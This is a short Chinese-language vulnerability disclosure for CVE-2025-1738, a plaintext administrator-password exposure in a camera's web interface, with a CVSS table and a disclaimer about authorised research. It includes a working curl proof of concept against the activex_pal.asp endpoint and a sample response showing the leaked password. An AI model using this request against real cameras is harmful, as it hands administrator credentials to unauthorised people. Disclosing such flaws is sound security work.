在负责任披露之后,分配了两个官方 CVE。
| CVE | CVSS v3.1 | 分数 | CWE | 类型 |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | 明文密码暴露 |
任何本地用户无需事先认证即可检索到明文形式的管理员密码。
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
管理员密码以明文形式返回在响应体中。
activex_pal.asp 和 mblogin.asp 的意外访问。本仓库仅用于教育和授权安全研究。作者不对任何滥用行为负责。在测试任何设备前务必获得明确许可。